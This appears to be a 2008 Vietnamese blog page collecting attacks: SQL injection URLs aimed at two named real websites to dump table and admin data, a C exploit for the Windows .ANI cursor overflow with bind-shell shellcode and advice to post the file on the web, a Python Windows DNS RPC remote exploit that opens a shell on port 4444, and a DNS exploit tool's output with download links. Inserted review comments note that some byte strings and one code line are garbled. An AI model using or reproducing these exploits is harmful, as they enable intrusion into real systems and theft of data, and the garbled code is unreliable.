Thứ Bảy, 5 tháng 4, 2008

exploit

http://www.vietphong.com.vn/product_detail.php?cat=64&id=-1 union all select 1,2,3,4,5,concat(table_name,char(124),char(124),column_name),7,8,9,10,11,12,13,14 from information_schema.columns/*

http://www.phapvan.ca/noidung/Tin_tuc.asp?act=XemChiTiet&Cat_ID=2&News_ID=921'&LinksFrom=http://www.phapvan.ca/noidung/Tin_tuc.aspx
http://www.phapvan.ca/noidung/Tin_tuc.asp?act=XemChiTiet&Cat_ID=2&News_ID=921 union select 0 from admin%22having 1=1--sp_password &LinksFrom=http://www.phapvan.ca/noidung/Tin_tuc.aspx
http://www.phapvan.ca/noidung/Tin_tuc.asp?act=XemChiTiet&Cat_ID=2&News_ID=921 union select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from admin&LinksFrom=http://www.phapvan.ca/noidung/Tin_tuc.aspx

Thứ Ba, 1 tháng 4, 2008

Default MS Windows Animated Cursor (.ANI) Local Overflow Exploit

/*
.ANI exploit tested on Windows XP SP2 - Portuguese
Shellcode port bind 13579

JMP ESP Addr - ntdll.dll

Greetz: Marsu, Devcode, Str0ke, Dave, Sekure.org guys, Sauna.


Exploit coded listen sauna hits
Featuring Luiz Zanardo's gigs "Minoide -\x52\x49\x46\x46\x00\x04\x00\x41"

Breno Silva Pinto
bsilva[at]Sekure.org
*/




#include
#include
#include


/*
 * RIFF/ACON container bytes for the crafted cursor file.
 *
 * As written: "RIFF" + size, the "ACON" form type, a first "anih" chunk
 * declaring 0x24 (36) bytes, and - after the two "TSIL" chunks - a second
 * "anih" chunk header declaring 0x3A8 (936) bytes.  The two "anih" headers
 * disagree on the structure's length; that inconsistency is what a
 * validating parser or a file-format signature should flag.
 *
 * NOTE(review): as published on this page several escapes read "\ x61"
 * (stray space), so the listing does not compile as-is.
 */
unsigned char aniheader[] =
"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\ x61\x6E\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\ x0A\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00"
"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\ x03\x00\x00\x00"
"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\ x02\x02\x02\x02"
"\x61\x6E\x69\x68\xA8\x03\x00\x00";

/*
 * Payload bytes copied into the file body by main(): a run of 0x90 followed
 * by an encoded payload.  The header comment says it opens a listener on
 * TCP port 13579; that cannot be verified from the bytes alone.  From a
 * monitoring standpoint, a process that has just parsed a cursor file and
 * then opens a listening socket is the observable.
 *
 * NOTE(review): many escapes here read "\ x90" (stray space) as published;
 * the text no longer represents the original byte string.
 */
unsigned char Shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90"
"\x29\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\ x81\x73\x13\x8f"
"\x35\x37\x85\x83\xeb\xfc\xe2\xf4\x73\x5f\xdc\xca\ x67\xcc\xc8\x7a"
"\x70\x55\xbc\xe9\xab\x11\xbc\xc0\xb3\xbe\x4b\x80\ xf7\x34\xd8\x0e"
"\xc0\x2d\xbc\xda\xaf\x34\xdc\x66\xbf\x7c\xbc\xb1\ x04\x34\xd9\xb4"
"\x4f\xac\x9b\x01\x4f\x41\x30\x44\x45\x38\x36\x47\ x64\xc1\x0c\xd1"
"\xab\x1d\x42\x66\x04\x6a\x13\x84\x64\x53\xbc\x89\ xc4\xbe\x68\x99"
"\x8e\xde\x34\xa9\x04\xbc\x5b\xa1\x93\x54\xf4\xb4\ x4f\x51\xbc\xc5"
"\xbf\xbe\x77\x89\x04\x45\x2b\x28\x04\x75\x3f\xdb\ xe7\xbb\x79\x8b"
"\x63\x65\xc8\x53\xbe\xee\x51\xd6\xe9\x5d\x04\xb7\ xe7\x42\x44\xb7"
"\xd0\x61\xc8\x55\xe7\xfe\xda\x79\xb4\x65\xc8\x53\ xd0\xbc\xd2\xe3"
"\x0e\xd8\x3f\x87\xda\x5f\x35\x7a\x5f\x5d\xee\x8c\ x7a\x98\x60\x7a"
"\x59\x66\x64\xd6\xdc\x66\x74\xd6\xcc\x66\xc8\x55\ xe9\x5d\x02\x8e"
"\xe9\x66\xbe\x64\x1a\x5d\x93\x9f\xff\xf2\x60\x7a\ x59\x5f\x27\xd4"
"\xda\xca\xe7\xed\x2b\x98\x19\x6c\xd8\xca\xe1\xd6\ xda\xca\xe7\xed"
"\x6a\x7c\xb1\xcc\xd8\xca\xe1\xd5\xdb\x61\x62\x7a\ x5f\xa6\x5f\x62"
"\xf6\xf3\x4e\xd2\x70\xe3\x62\x7a\x5f\x53\x5d\xe1\ xe9\x5d\x54\xe8"
"\x06\xd0\x5d\xd5\xd6\x1c\xfb\x0c\x68\x5f\x73\x0c\ x6d\x04\xf7\x76"
"\x25\xcb\x75\xa8\x71\x77\x1b\x16\x02\x4f\x0f\x2e\ x24\x9e\x5f\xf7"
"\x71\x86\x21\x7a\xfa\x71\xc8\x53\xd4\x62\x65\xd4\ xde\x64\x5d\x84"
"\xde\x64\x62\xd4\x70\xe5\x5f\x28\x56\x30\xf9\xd6\ x70\xe3\x5d\x7a"
"\x70\x02\xc8\x55\x04\x62\xcb\x06\x4b\x51\xc8\x53\ xdd\xca\xe7\xed"
"\xf1\xed\xd5\xf6\xdc\xca\xe1\x7a\x5f\x35\x37\x85" ;


/*
 * Writes the crafted .ANI file to the path given as argv[1].
 *
 * The file body is exactly 1024 bytes: aniheader[] at offset 0, 0x90
 * filler elsewhere, a hard-coded 4-byte address at offset 168 and the
 * Shellcode[] bytes from offset 198.  Returns 0 on every path, including
 * the usage and fopen() failure cases.
 *
 * NOTE(review): the argument check reads "argc <>" on this page - the
 * comparison operand was lost in extraction, so the listing does not
 * compile as published.
 */
int main( int argc, char **argv ) {
char Buffer[1024];
FILE *f;

if ( argc <>
printf("usage %s \n",argv[0]);
return 0;
}

/* Fill the whole buffer with 0x90, then overlay the RIFF/ACON header at
 * offset 0 (the "- 1" drops the string literal's terminating NUL). */
memset( Buffer, 0x90, sizeof( Buffer ) );
memcpy( Buffer, aniheader, sizeof( aniheader ) - 1 );

/* Fixed offsets: a single hard-coded address (header comment: ntdll.dll on
 * Windows XP SP2 Portuguese) at 168, payload 30 bytes later at 198.  With
 * both the address and the offsets fixed, the file presumably only matches
 * that one DLL build. */
memcpy( Buffer + 168, "\xed\x1e\x94\x7c", 4 ); // JMP ESP - NTDLL. Hey Dave ... this is for you brotha!
memcpy( Buffer + 198, Shellcode, sizeof( Shellcode ) - 1 );


/* Write all 1024 bytes in binary mode; the trailing filler past the
 * payload is part of the file. */
f = fopen( argv[1], "wb" );
if ( f == NULL ) {
printf("Cannot create file\n");
return 0;
}

fwrite(Buffer, 1, 1024, f);
fclose(f);
printf(".ANI file created!\n");
return 0;
}

Compile->Run để nhúng vô .ani file! Bỏ lên web!

Windows 2k SP4 DNS RPC

#!/usr/bin/python
# Remote exploit for the 0day Windows DNS RPC service vulnerability as
# described in http://www.securityfocus.com/bid/23470/info. Tested on
# Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444
# and then connects to it.
#
# Cheers to metasploit for the first exploit.
# Written for educational and testing purposes.
# Author shall bear no responsibility for any damage caused by using this code
# Winny Thomas :-)

import os
import sys
import time
from impacket.dcerpc import transport, dcerpc, epm
from impacket import uuid

#Portbind shellcode from metasploit; Binds port to TCP port 4444
# Payload bytes appended to the request stub below.  The author's comment
# says it opens a listener on TCP 4444, and main() telnets to that port
# after sending; neither is verifiable from the bytes themselves.
# NOTE(review): as published on this page many escapes read "\ x90" with a
# stray space, so this text no longer decodes to the original byte string.
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90"
shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\ x81\x76\x0e\xe9"
shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\ x01\xb3\x49\x56"
shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\ x91\x4b\x59\x22"
shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\ x07\x7b\x76\x30"
shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\ xd2\x1e\x92\x81"
shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\ xb6\x56\xb7\x42"
shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\ x62\x09\x86\x22"
shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\ xa7\x44\x5a\xf9"
shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\ xb6\x1e\x49\x79"
shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\ x68\xa7\xbe\xab"
shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\ x3f\x19\xe5\xfa"
shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\ x8f\x19\x3f\x48"
shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\ xbc\xb5\x66\xc1"
shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\ x0c\x03\x30\xe0"
shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\ x90\x8c\xcf\xfe"
shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\ x60\xaf\xdc\xf9"
shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\ x43\xb4\xf4\x84"
shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\ x17\xf9\xa0\x56"
shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\ xb8\x1b\xe3\xf8"
shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\ x16\x7d\x49\x79"
shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\ x19\xc0\xb2\xf6"
shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"

# Stub sections taken from metasploit
# Request body passed as the single argument of RPC operation 0x01 in
# ExploitDNS().  The long run of backslash-escaped 'A's is the data that
# overruns the server-side buffer (the author's inline comments describe the
# control-flow redirection); the shellcode above is appended at the end.
# From a detection standpoint, a DNS RPC request carrying hundreds of
# repeated "\A" bytes is a distinctive pattern.
# NOTE(review): the "\ x04"-style escapes here are corrupted by stray
# spaces as published.
stub = '\xd2\x5f\xab\xdb\x04\x00\x00\x00\x00\x00\x00\x00\ x04\x00\x00\x00'
stub += '\x70\x00\x00\x00\x00\x00\x00\x00\x1f\x38\x8a\x9f\ x12\x05\x00\x00'
stub += '\x00\x00\x00\x00\x12\x05\x00\x00'
stub += '\\A' * 465
# At the time of overflow ESP points into our buffer which has each char
# prepended by a '\' and our shellcode code is about 24+ bytes away from
# where EDX points
stub += '\\\x80\\\x62\\\xE1\\\x77'#Address of jmp esp from user32.dll
# The following B's which in assembly translates to 'inc EDX' increments
# about 31 times EDX so that it points into our shellcode
stub += '\\B' * 43
# Translates to 'jmp EDX'
stub += '\\\xff\\\xe2'
stub += '\\A' * 134
stub += '\x00\x00\x00\x00\x76\xcf\x80\xfd\x03\x00\x00\x00\ x00\x00\x00\x00'
stub += '\x03\x00\x00\x00\x47\x00\x00\x00'
stub += shellcode

# Code ripped from core security document on impacket
# http://www.coresecurity.com/files/at...etv0.9.6.0.pdf
# Not a neat way to discover a dynamic port :-)
#
# Finds the dynamic TCP port of the DNS server RPC interface on `target`:
# connects to the endpoint mapper over SMB (port 139, 'epmapper' pipe),
# walks portmap_dump() entries until the interface UUID
# 50ABC2A4-574D-40B3-9D66-EE4FD5FBA076 appears, and returns the port parsed
# from that entry's string binding as an int.  If no entry matches it prints
# a message and falls off the end, returning None (the caller then formats
# that value with %d).
# Defender's view: endpoint-mapper enumeration over SMB followed by a bind
# to the DNS server interface is the observable precursor of this exploit.
def DiscoverDNSport(target):
trans = transport.SMBTransport(target, 139, 'epmapper')
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
# Bind to the endpoint mapper interface, version 3.0.
dce.bind(uuid.uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA','3.0')))
pm = epm.DCERPCEpm(dce)
# All-zero enumeration handle starts the dump from the beginning.
handle = '\x00'*20
while 1:
dump = pm.portmap_dump(handle)
# No entries left: the interface was not registered.
if not dump.get_entries_num():
break
# Continue the enumeration from the handle the server returned.
handle = dump.get_handle()
entry = dump.get_entry().get_entry()
if(uuid.bin_to_string(entry.get_uuid()) == '50ABC2A4-574D-40B3-9D66-EE4FD5FBA076'):
# String binding looks like "ncacn_ip_tcp:host[port]"; take what is
# inside the brackets.
port = entry.get_string_binding().split('[')[1][:-1]
return int(port)

print '[-] Could not locate DNS port; Target might not be running DNS'

# Sends the prepared `stub` to the DNS server RPC interface (UUID
# 50abc2a4-574d-40b3-9d66-ee4fd5fba076, version 5.0) over plain TCP on
# `port`, as operation number 0x01.  No response is read or checked;
# success is only inferred by main() connecting to port 4444 afterwards.
def ExploitDNS(target, port):
trans = transport.TCPTransport(target, port)
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
dce.bind(uuid.uuidtup_to_bin(('50abc2a4-574d-40b3-9d66-ee4fd5fba076','5.0')))

dce.call(0x01, stub)

# Runs /usr/bin/telnet against target:4444 through a shell via os.system().
# `target` is interpolated into the command line unquoted, so it is assumed
# to be a plain host name or address (main() takes it from argv[1]).
def ConnectRemoteShell(target):
connect = "/usr/bin/telnet " + target + " 4444"
os.system(connect)

# Entry point: one positional argument, the target host.
if __name__ == '__main__':
try:
target = sys.argv[1]
except IndexError:
print 'Usage: %s ' % sys.argv[0]
sys.exit(-1)

print '[+] Locating DNS RPC port'
port = DiscoverDNSport(target)
# NOTE(review): DiscoverDNSport() returns None when no matching endpoint
# is found, and the %d below then raises TypeError instead of a clean exit.
print '[+] Located DNS RPC service on TCP port: %d' % port
ExploitDNS(target, port)
# Fixed 3-second wait before the telnet attempt; nothing confirms the
# request had any effect.
print '[+] Exploit sent. Connecting to shell in 3 seconds'
time.sleep(3)
ConnectRemoteShell(target)

MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445) v2

Exploit v2 features:
- Target Remote port 445 (by default but requires auth)
- Manual target for dynamic tcp port (without auth)
- Automatic search for dynamic dns rpc port
- Local and remote OS fingerprinting (auto target)
- Windows 2000 server and Windows 2003 server (Spanish) supported by default
- Fixed bug with Windows 2003 Shellcode
- Universal local exploit for Win2k (automatic search for opcodes)
- Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)
- Added targets for remote Win2k English and Italian (not tested; found with the Metasploit opcode database — please report your own)
- Microsoft RPC api used ( who cares? )


D:\Program Files\DNSTEST>dnstest
--------------------------------------------------------------
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
--------------------------------------------------------------

Usage: dnstest -h 127.0.0.1 (Universal local exploit)
dnstest -h host [-t id] [-p port]
Targets:
0 (0x30270b0b) - Win2k3 server SP2 Universal - (default for win2k3)
1 (0x79467ef8) - Win2k server SP4 Spanish - (default for win2k )
2 (0x7c4fedbb) - Win2k server SP4 English
3 (0x7963edbb) - Win2k server SP4 Italian
4 (0x41414141) - Windows all Denial of Service


D:\Program Files\DNSTEST>dnstest.exe -h 192.168.1.2
--------------------------------------------------------------
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
--------------------------------------------------------------

[+] Trying to fingerprint target.. (05.02)
[+] Remote Host identified as Windows 2003
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp: 192.168.1.2
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105]
[+] Dynamic DNS rpc port found (1105)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105]
[+] RpcBindingFromStringBinding success
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444


also available at

http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip
http://www.48bits.com/exploits/dnsxpl.v2.1.zip
http://www.milw0rm.com/sploits/04172007-dnsxpl.v2.1.zip